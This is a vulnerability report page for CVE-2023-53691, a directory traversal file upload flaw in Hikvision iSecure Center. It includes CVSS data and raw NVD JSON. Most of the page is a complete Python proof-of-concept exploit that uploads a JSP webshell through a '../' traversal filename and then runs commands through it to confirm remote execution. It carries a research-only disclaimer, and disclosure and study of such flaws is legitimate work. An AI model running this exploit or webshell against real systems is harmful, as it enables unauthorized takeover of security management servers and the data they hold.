Security Vulnerability Report
中文
CVE-2023-53691 CVSS 8.3 HIGH

CVE-2023-53691

Published: 2025-10-22 04:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2023-06-25 allows file upload via /center/api/files directory traversal, as exploited in the wild in 2024 and 2025.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hikvision CSMP iSecure Center <= 2023-06-25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2023-53691 - Hikvision iSecure Center Directory Traversal File Upload PoC This PoC demonstrates the directory traversal vulnerability in the file upload endpoint /center/api/files of Hikvision CSMP iSecure Center. """ import requests import sys TARGET_URL = "http://target-host" UPLOAD_ENDPOINT = "/center/api/files" # Malicious JSP webshell content (for demonstration purposes only) WEBSHELL_CONTENT = b"""<%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); if (cmd != null) { Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", cmd}); BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = br.readLine()) != null) { out.println(line); } } %>""" def exploit(target_url, traversal_path, filename="shell.jsp"): """ Exploit directory traversal to upload a webshell to the web root directory. :param target_url: Base URL of the target Hikvision iSecure Center :param traversal_path: Directory traversal sequence to escape upload directory :param filename: Name of the malicious file to upload """ upload_url = target_url.rstrip('/') + UPLOAD_ENDPOINT # Construct the traversal filename malicious_filename = traversal_path + filename print(f"[*] Target URL: {upload_url}") print(f"[*] Malicious filename: {malicious_filename}") # Prepare multipart file upload with traversal path files = { 'file': (malicious_filename, WEBSHELL_CONTENT, 'application/octet-stream') } # Additional form data that may be required by the API data = { 'name': malicious_filename, 'type': 'file' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*', 'Connection': 'close' } try: # Send the malicious upload request response = requests.post( upload_url, files=files, data=data, headers=headers, timeout=30, verify=False ) print(f"[*] Response Status Code: {response.status_code}") print(f"[*] Response Headers: {dict(response.headers)}") print(f"[*] Response Body (first 500 chars): {response.text[:500]}") if response.status_code in [200, 201]: print(f"[+] Upload may have succeeded!") # Try to access the uploaded webshell webshell_url = target_url.rstrip('/') + '/' + filename print(f"[*] Try accessing webshell at: {webshell_url}?cmd=id") check_response = requests.get(webshell_url, params={"cmd": "id"}, timeout=10) print(f"[*] Webshell Response Status: {check_response.status_code}") print(f"[*] Webshell Response: {check_response.text[:500]}") if check_response.status_code == 200 and "uid=" in check_response.text: print("[+] SUCCESS! Webshell is accessible and executing commands!") return True else: print(f"[-] Upload failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url> [traversal_path]") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080") print(f"Example: {sys.argv[0]} http://192.168.1.100:8080 ../../../../webapps/ROOT/") sys.exit(1) target = sys.argv[1] traversal = sys.argv[2] if len(sys.argv) > 2 else "../../../../webapps/ROOT/" requests.packages.urllib3.disable_warnings() success = exploit(target, traversal) sys.exit(0 if success else 1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53691", "sourceIdentifier": "[email protected]", "published": "2025-10-22T04:15:51.837", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hikvision CSMP (Comprehensive Security Management Platform) iSecure Center through 2023-06-25 allows file upload via /center/api/files directory traversal, as exploited in the wild in 2024 and 2025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "references": [{"url": "https://zhuanlan.zhihu.com/p/639514473", "source": "[email protected]"}, {"url": "https://zhuanlan.zhihu.com/p/639514473", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.